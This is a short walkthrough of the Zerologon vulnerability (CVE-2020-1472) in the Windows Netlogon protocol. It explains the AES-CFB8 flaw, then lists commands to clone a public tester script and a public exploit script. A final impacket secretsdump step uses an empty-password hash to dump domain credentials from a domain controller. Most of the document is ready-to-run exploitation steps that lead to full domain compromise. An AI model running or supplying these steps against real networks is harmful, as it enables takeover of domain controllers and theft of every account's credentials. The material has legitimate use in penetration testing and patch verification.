[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)
The attack described here takes advantage of flaws in a cryptographic authentication protocol (insecure use of AES-CFB8) that proves the authenticity and identity of a domain-joined computer to the Domain Controller (DC). Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password (simply sending a number of Netlogon messages in which various fields are filled with zeroes) for that account in the domain. This can then be used to obtain domain admin credentials and then restore the original DC password.
In order to checking CVE-2020-1472
- git clone https://github.com/SecuraBV/CVE-2020-1472.git
- cd CVE-2020-1472
- python3 -m venv env
- source env/bin/activate
- pip install -r requirements.txt
- python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (example: ./zerologon_tester.py DC01 172.16.208.161)
In order to exploit CVE-2020-1472
- git clone https://github.com/dirkjanm/CVE-2020-1472.git
- cd CVE-2020-1472
- python3 -m venv env
- source env/bin/activate
- python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (example: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
- git clone https://github.com/SecureAuthCorp/impacket.git
- cd impacket
- pip install .
- python setup.py install
- cd examples
Then, run one of the following command
Example format 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\$@DC01.zerologon.local -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Example format 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\$@172.16.208.161 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Original blogpost is available here
Original repository that includes python test script is available here
Original repository that includes python exploit script is available here